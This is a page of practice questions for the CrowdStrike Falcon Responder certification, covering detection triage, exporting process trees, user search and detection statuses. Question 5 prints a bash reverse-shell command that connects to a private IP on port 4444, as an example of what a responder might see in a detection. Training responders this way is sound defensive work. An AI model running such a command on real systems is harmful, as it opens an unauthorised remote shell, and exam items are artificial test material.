Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

New Release CCFR-201b CCFR Questions

Page: 2 / 16
Total 209 questions

CrowdStrike Certified Falcon Responder Questions and Answers

Question 5

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Question 6

A responder wants to include a visual representation of a process tree in an incident report. Which of the following is NOT a valid way to export process data from ' Full Detection Details ' ?

Options:

A.

Process Tree > PNG

B.

Process Tree > JPEG

C.

Detection > CSV

D.

Process Tree > JSON

Question 7

During a targeted investigation into a potentially compromised internal administrative account, a responder utilizes the User Search functionality within the Investigate menu. The goal is to identify if the account was leveraged to drop or launch unauthorized binaries across multiple systems in the environment. Which specific data category is natively visible in the User Search results to facilitate this check?

Options:

A.

Registry Key Operations

B.

Network File Transfer ports

C.

Unique Executables Written and Process Executions

D.

BIOS and Hardware modification logs

Question 8

An analyst notices a detection that has been automatically flagged with the ' New Activity ' status. Which of the following statements best describes what this status indicates?

Options:

A.

A brand new detection has been triggered on a host that was recently added to the network.

B.

A detection that was previously moved to a resolved status has generated new telemetry and activity.

C.

A user has logged into a machine for the first time since the sensor was installed.

D.

The Falcon Overwatch team has manually verified that the detection is an active threat.

Page: 2 / 16
Total 209 questions